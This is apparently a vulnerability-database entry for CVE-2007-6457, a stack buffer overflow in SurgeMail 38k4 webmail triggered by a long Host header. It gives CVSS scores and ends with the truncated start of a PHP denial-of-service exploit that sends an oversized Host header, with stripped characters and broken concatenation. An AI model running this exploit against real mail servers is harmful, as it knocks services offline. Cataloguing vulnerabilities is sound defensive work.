5
CVSSv2

CVE-2007-6457

Published: 20/12/2007 Updated: 15/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Stack-based buffer overflow in the webmail feature in SurgeMail 38k4 allows remote malicious users to cause a denial of service (crash) via a long Host header.

Vulnerable Product Search on Vulmon Subscribe to Product

netwin surgemail 38k4

Exploits

<?php /* SurgeMail v38k4 webmail Host header denial of service exploit tested against the windows version rgod */ dl("php_curlso"); $url = "19216801"; $puf=str_repeat(0xff,0xfff); $header ="POST / HTTP/10\r\n"; $header="Host: $puf\r\n"; $header="Connection: Close\r\n\r\n"; $ch = curl ...